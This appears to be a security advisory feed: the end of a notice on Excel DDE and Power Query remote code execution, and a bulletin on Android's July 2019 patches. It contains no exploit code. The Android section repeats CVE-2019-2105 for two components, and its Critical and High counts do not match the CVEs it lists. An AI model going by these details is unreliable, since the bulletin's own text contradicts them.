Successful exploitation of the DDE feature could allow attackers to perform remote code execution and take control of the affected systems to perform malicious activities, such as unauthorised installation of programmes, creating rogue administrator accounts, and being able to view, change, or delete data.

SOLUTION

Microsoft has published an advisory (https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440) on mitigation measures for DDE-related attacks. Users are recommended to apply the mitigation measures immediately.

REFERENCE

  1. https://threatpost.com/microsoft-excel-attack-vector/146062/
  2. https://www.mimecast.com/blog/2019/06/exploit-using-microsoft-excel-power-query-for-remote-dde-execution-discovered/
  3. https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440
  4. https://www.csa.gov.sg/singcert/news/advisories-alerts/microsoft-office-excel-attack-vector

CREDITS

The Mimecast Threat Center

DISCLAIMER

The information provided herein is on “as is” basis, without warranty of any kind.

Android Patches 33 New Security Vulnerabilities
https://cyberonsecurity.com/2019/07/31/android-patches-33-new-security-vulnerabilities/
Wed, 31 Jul 2019 12:16:19 +0000

SYSTEMS AFFECTED

  • Android devices

THREAT LEVEL

  • High

OVERVIEW

Google has started rolling out this month’s security updates for its mobile operating system platform to address a total of 33 new security vulnerabilities affecting Android devices, 9 of which have been rated critical in severity.

DESCRIPTION

This bulletin has two security patch levels. At the basic 2019-07-01 level, 12 bugs are addressed:

  • Five remote code execution vulnerabilities, all of which would be triggered by opening a specially crafted file: three (CVE-2019-2106, CVE-2019-2107, CVE-2019-2100) in the Android media framework, CVE-2019-2105 in Library and CVE-2019-2105 in System.
  • CVE-2019-2104 in Framework.
  • CVE-2019-2116, CVE-2019-2117, CVE-2019-2118 and CVE-2019-2119 in System are information disclosure bugs.
  • CVE-2019-2112 and CVE-2019-2113 are elevation of privilege vulnerabilities.

Of the closed-source component CVEs, ten were for issues rated as High security risk, which means flaws such as elevation of privilege and information disclosure. Another three were classified as Critical, which means remote code execution vulnerabilities that require little to no user interaction to exploit.

  • CVE-2019-2308 in DSP Services and CVE-2019-2330 in Kernel were classified as Critical.
  • The other six were labelled High severity and were found in WLAN Host (CVE-2019-2276, CVE-2019-2307), WLAN Driver (CVE-2019-2305), HLOS (CVE-2019-2278), and Audio (CVE-2019-2326, CVE-2019-2328).

IMPACT

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

SOLUTION

Check your Android version and apply the latest security update.

REFERENCE

  1. https://source.android.com/security/bulletin/2019-07-01
  2. https://www.bleepingcomputer.com/news/security/july-android-security-update-fixes-four-critical-rce-flaws/
  3. https://www.theregister.co.uk/2019/07/01/july_android_fixes/
  4. https://thehackernews.com/2019/07/android-security-update.html

CREDITS

@Android

DISCLAIMER

The information provided herein is on “as is” basis, without warranty of any kind.
